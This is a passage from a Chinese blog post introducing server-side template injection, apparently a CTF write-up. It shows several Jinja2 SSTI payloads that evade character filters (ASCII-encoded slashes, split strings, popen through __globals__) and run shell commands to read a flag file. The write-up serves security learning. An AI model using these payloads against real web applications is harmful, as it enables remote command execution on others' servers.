<figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nix"><span class="hljs-operator">+</span> <span class="hljs-operator">-</span> <span class="hljs-operator">*</span> <span class="hljs-symbol">/</span> . &#123;&#123; &#125;&#125; <span class="hljs-params">__ :</span> <span class="hljs-string">&quot; \</span><br></code></pre></td></tr></table></figure>

这些符号被过滤了

/被过滤了比较难处理，我用了ASCII码绕过

<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="language-xml">BaseCTF</span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">set</span> sun=<span class="hljs-string">&#x27;%c%c%c%c%c%c%c&#x27;</span>%(<span class="hljs-number">99</span>,<span class="hljs-number">97</span>,<span class="hljs-number">116</span>,<span class="hljs-number">32</span>,<span class="hljs-number">47</span>,<span class="hljs-number">102</span>,<span class="hljs-number">42</span>)<span class="hljs-template-tag">%&#125;</span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">print</span> ((sb<span class="hljs-punctuation">|</span>attr(<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_eq_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>))[<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;g&#x27;</span><span class="hljs-string">&#x27;lobals&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;sys&#x27;</span>][<span class="hljs-string">&#x27;modules&#x27;</span>][<span class="hljs-string">&#x27;o&#x27;</span><span class="hljs-string">&#x27;s&#x27;</span>][<span class="hljs-string">&#x27;p&#x27;</span><span class="hljs-string">&#x27;open&#x27;</span>](sun))[<span class="hljs-string">&#x27;read&#x27;</span>]()<span class="hljs-template-tag">%&#125;</span><br></code></pre></td></tr></table></figure>

wp中的法一与我的方法类似，它用的是通用对象链

<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="language-xml">BaseCTF</span><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">set</span> cmd=<span class="hljs-string">&#x27;cat &#x27;</span>~<span class="hljs-string">&#x27;%c&#x27;</span>%(<span class="hljs-number">47</span>)~<span class="hljs-string">&#x27;flag&#x27;</span> <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-tag">&#123;%</span><span class="hljs-name">print</span>(<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_cl&#x27;</span><span class="hljs-string">&#x27;ass_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_ba&#x27;</span><span class="hljs-string">&#x27;se_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_subcla&#x27;</span><span class="hljs-string">&#x27;sses_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>]()[<span class="hljs-number">137</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_in&#x27;</span><span class="hljs-string">&#x27;it_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_glo&#x27;</span><span class="hljs-string">&#x27;bals_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;po&#x27;</span><span class="hljs-string">&#x27;pen&#x27;</span>](cmd)[<span class="hljs-string">&#x27;rea&#x27;</span><span class="hljs-string">&#x27;d&#x27;</span>]())<span class="hljs-template-tag">%&#125;</span><br></code></pre></td></tr></table></figure>



<p>法二：利用环境变量的值</p>
<p>查看环境变量，可以看到 <code>OLDPWD=/</code></p>


<figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mel">BaseCTF&#123;%print(<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_cl&#x27;</span><span class="hljs-string">&#x27;ass_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_ba&#x27;</span><span class="hljs-string">&#x27;se_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_subcla&#x27;</span><span class="hljs-string">&#x27;sses_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>]()[<span class="hljs-number">137</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_in&#x27;</span><span class="hljs-string">&#x27;it_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_glo&#x27;</span><span class="hljs-string">&#x27;bals_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;po&#x27;</span><span class="hljs-string">&#x27;pen&#x27;</span>](<span class="hljs-string">&#x27;env&#x27;</span>)[<span class="hljs-string">&#x27;rea&#x27;</span><span class="hljs-string">&#x27;d&#x27;</span>]())%&#125;<br></code></pre></td></tr></table></figure>

此时可以直接利用它来切换到根目录，然后再读flag

<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dart">BaseCTF&#123;%<span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_cl&#x27;</span><span class="hljs-string">&#x27;ass_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_ba&#x27;</span><span class="hljs-string">&#x27;se_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_subcla&#x27;</span><span class="hljs-string">&#x27;sses_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>]()[<span class="hljs-number">137</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_in&#x27;</span><span class="hljs-string">&#x27;it_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_glo&#x27;</span><span class="hljs-string">&#x27;bals_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;po&#x27;</span><span class="hljs-string">&#x27;pen&#x27;</span>](<span class="hljs-string">&#x27;cd <span class="hljs-subst">$OLDPWD</span>;cat flag&#x27;</span>)[<span class="hljs-string">&#x27;rea&#x27;</span><span class="hljs-string">&#x27;d&#x27;</span>]())%&#125;<br></code></pre></td></tr></table></figure>



<p>法三：利用 <code>expr substr</code> 切割出一个 <code>/</code></p>
<p>比如 pwd 中的第一个字符就是 <code>/</code> ，那用 <code>expr substr</code> 切割出来后，之后就可以像法二那样切换到根目录然后读 flag 了</p>


<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dart">BaseCTF&#123;%<span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;&#x27;</span>[<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_cl&#x27;</span><span class="hljs-string">&#x27;ass_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_ba&#x27;</span><span class="hljs-string">&#x27;se_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_subcla&#x27;</span><span class="hljs-string">&#x27;sses_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>]()[<span class="hljs-number">137</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_in&#x27;</span><span class="hljs-string">&#x27;it_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;_&#x27;</span><span class="hljs-string">&#x27;_glo&#x27;</span><span class="hljs-string">&#x27;bals_&#x27;</span><span class="hljs-string">&#x27;_&#x27;</span>][<span class="hljs-string">&#x27;po&#x27;</span><span class="hljs-string">&#x27;pen&#x27;</span>](<span class="hljs-string">&#x27;a=`pwd`;a=`expr substr <span class="hljs-subst">$a</span> 1 1`;cd <span class="hljs-subst">$a</span>;cat flag&#x27;</span>)[<span class="hljs-string">&#x27;rea&#x27;</span><span class="hljs-string">&#x27;d&#x27;</span>]())%&#125;<br></code></pre></td></tr></table></figure>



<p>pwd的作用是打印当前工作目录的绝对路径，所以它的输出必然以 <code>/</code> 开头</p>
<h2 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_38154820/article/details/111399386">细说Jinja2之SSTI&amp;bypass</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/tuzkizki/p/15394415.html">Python SSTI漏洞学习总结 _</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>SSTI入门</div>
      <div>https://www.sunynov.top/2026/02/01/SSTI入门/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>suny</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年2月1日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/02/03/PCTF2025/" title="PCTF2025">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">PCTF2025</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/01/31/VNCTF2026/" title="VNCTF2026">
                        <span class="hidden-mobile">VNCTF2026</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sg2xM2g9UCt39D62pmfzcl8b-gzGzoHsz","appKey":"ludHhVlixZUIrJv11t6rmegp","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":true,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://icp.gov.moe/?keyword=20250279" target="_blank">萌ICP备20250279号</a> <br> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
